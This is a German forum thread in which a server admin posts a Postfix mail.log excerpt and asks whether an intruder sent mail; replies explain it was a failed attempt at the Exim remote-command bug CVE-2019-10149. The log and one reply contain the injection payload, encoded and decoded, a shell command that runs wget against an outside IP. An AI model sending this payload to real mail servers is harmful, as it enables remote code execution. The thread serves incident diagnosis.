Alarmierendes mail.log

[Fan]

Ich habe eine alarmierende Zeile in meinem mail.log gefunden, mit der ich nicht so recht weiß, wie ich damit umgehen soll. Es sieht so aus, als ob ein Eindringling es tatsächlich geschafft hat, eine E-Mail von meinem Server zu senden. Hier ein Auszug aus dem Log. (Domain und IP geändert)

Jun 19 18:48:31 serverdomain postfix/smtpd[21253]: warning: hostname mta-98-156-161-87.kc.rr.com does not resolve to address 98.156.161.87
Jun 19 18:48:31 serverdomain postfix/smtpd[21253]: connect from unknown[98.156.161.87]
Jun 19 18:48:32 serverdomain postfix/smtpd[21253]: NOQUEUE: reject: RCPT from unknown[98.156.161.87]: 550 5.1.1 <root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f11.11.11.11x22}}@mail.serverdomain.de>: Recipient address rejected: User unknown in local recipient table; from=<support@service.com> to=<root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f11.11.11.11x22}}@mail.serverdomain.de> proto=SMTP helo=<service.com>
Jun 19 18:48:32 serverdomain postfix/smtpd[21253]: 8994C9E43E: client=unknown[98.156.161.87]
Jun 19 18:48:32 serverdomain postfix/smtpd[21253]: 8994C9E43E: reject: RCPT from unknown[98.156.161.87]: 504 5.5.2 <root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f11.11.11.11x22}}@localhost>: Recipient address rejected: need fully-qualified address; from=<support@service.com> to=<root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f11.11.11.11x22}}@localhost> proto=SMTP helo=<service.com>
Jun 19 18:48:33 serverdomain postfix/cleanup[21258]: 8994C9E43E: message-id=<>
Jun 19 18:48:33 serverdomain opendkim[830]: 8994C9E43E: can't determine message sender; accepting
Jun 19 18:48:33 serverdomain postfix/qmgr[1126]: 8994C9E43E: from=<support@service.com>, size=815, nrcpt=1 (queue active)
Jun 19 18:48:33 serverdomain dovecot: auth: userdb(?): Username character disallowed by auth_username_chars: 0x2b (username: post+${run{x2fbinx2fsht-ctx22wgetx2064.50.180.45x2ftmpx2f11.11.11.11x22}}@serverdomain.de)
Jun 19 18:48:33 serverdomain postfix/pipe[21259]: 8994C9E43E: to=<post+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f11.11.11.11x22}}@serverdomain.de>, orig_to=<root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f11.11.11.11x22}}@serverdomain.de>, relay=dovecot, delay=0.87, delays=0.83/0.01/0/0.03, dsn=5.1.1, status=bounced (user unknown)
Jun 19 18:48:33 serverdomain postfix/cleanup[21258]: 1AC909E440: message-id=<20190619134833.1AC909E440@mail.serverdomain.de>
Jun 19 18:48:33 serverdomain postfix/qmgr[1126]: 1AC909E440: from=<>, size=3114, nrcpt=1 (queue active)
Jun 19 18:48:33 serverdomain postfix/bounce[21261]: 8994C9E43E: sender non-delivery notification: 1AC909E440
Jun 19 18:48:33 serverdomain postfix/qmgr[1126]: 8994C9E43E: removed
Jun 19 18:48:33 serverdomain postfix/smtpd[21253]: disconnect from unknown[98.156.161.87] helo=1 mail=1 rcpt=1/3 data=1 quit=1 commands=5/7
Jun 19 18:48:33 serverdomain postfix/smtp[21262]: 1AC909E440: to=<support@service.com>, relay=aspmx.l.google.com[173.194.76.27]:25, delay=0.15, delays=0.01/0.02/0.1/0.03, dsn=5.1.1, status=bounced (host aspmx.l.google.com[173.194.76.27] said: 550-5.1.1 The email account that you tried to reach does not exist. Please try 550-5.1.1 double-checking the recipient's email address for typos or 550-5.1.1 unnecessary spaces. Learn more at 550 5.1.1 https://support.google.com/mail/?p=NoSuchUser b12si16201767wrt.117 - gsmtp (in reply to RCPT TO command))
Jun 19 18:48:33 serverdomain postfix/qmgr[1126]: 1AC909E440: removed

Ich habe die Zeile einmal markiert, die für mich so aussieht, als war der Versuch potenziell erfolgreich. Hier wurde zwar an einen nicht existierenden Account versandt, aber das muss ja nicht so bleiben. Kann mir da jemand die Sorge nehmen oder helfen, diese Lücke zu schließen? Eigentlich sollte das völlig unmöglich sein, weil mein Mailserver nur von existierenden Aliases versenden darf. Der verwendete Alias post@serverdomain.de (geändert) existiert zwar, aber da ist noch die Zeichenkette ${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f11.11.11.11x22}} dazwischen. Ist das eine bekannte Methode, mit der es gelingt, sich als Absender auszugeben? Weiß da jemand was darüber?

 

[Deleted member 11740]

Noch nie gesehen, aber ersetzt man die Hex-Werte mit den dazugegörigen Zeichen, ergibt der String mehr Sinn.

${run{/bin/sht-ct"wget 64.50.180.45/tmp/11.11.11.11"}}

Weitere infos gibt es hier: "Return of the Wizard" Attack
Hier gibt es Infos wie man den Exploit anwendet: https://seclists.org/fulldisclosure/2019/Jun/16

 

[d4f]

Das ist ein Versuch den Exim-Bug CVE-2019-10149 zu triggern. Da du Postfix einsetzt kannst du dich (diesmal) beruhigt zurücklehnen

weil mein Mailserver nur von existierenden Aliases versenden darf

Er hat die Email ja auch verweigert weil er relaying nicht erlaubt und kein lokales Konto auf dem Server die genannte EMail-Adresse hat. Wenn du letzteres verbieten würdest, könnte dir niemand eine Email dahin schicken.

 

[danton]

Das sieht mir danach aus, als wenn da noch ein paar Logzeilen fehlen (also der Ausschnitt nicht ausreicht). Die versendete Mail an support@service.com ist ein Bounce-Mail, der von deinem Server generiert wurde. Evtl. ein Spamfilter, der Mails zu spät ablehnt, und dadurch Bounces generiert? Korrektur: SIeht danach aus, als wenn Dovecot den Bounce auf Grund nicht erlaubter Zeichen angetriggert hat.
Zu der Zeichenketten haben meine Vorredner ja schon alles wichtige gesagt

 

[Fan]

@DeaD_EyE : Danke für die Erklärung.
@d4f : Puh! Da bin ich beruhigt.
@danton : Ich habe gerade nochmal nachgesehen, das sind alle Zeilen bzgl. des Vorgangs.